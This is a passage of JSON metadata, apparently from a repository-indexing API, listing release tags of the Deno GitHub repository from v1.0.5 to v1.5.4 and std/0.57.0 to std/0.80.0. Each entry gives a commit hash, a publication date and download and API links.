1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16: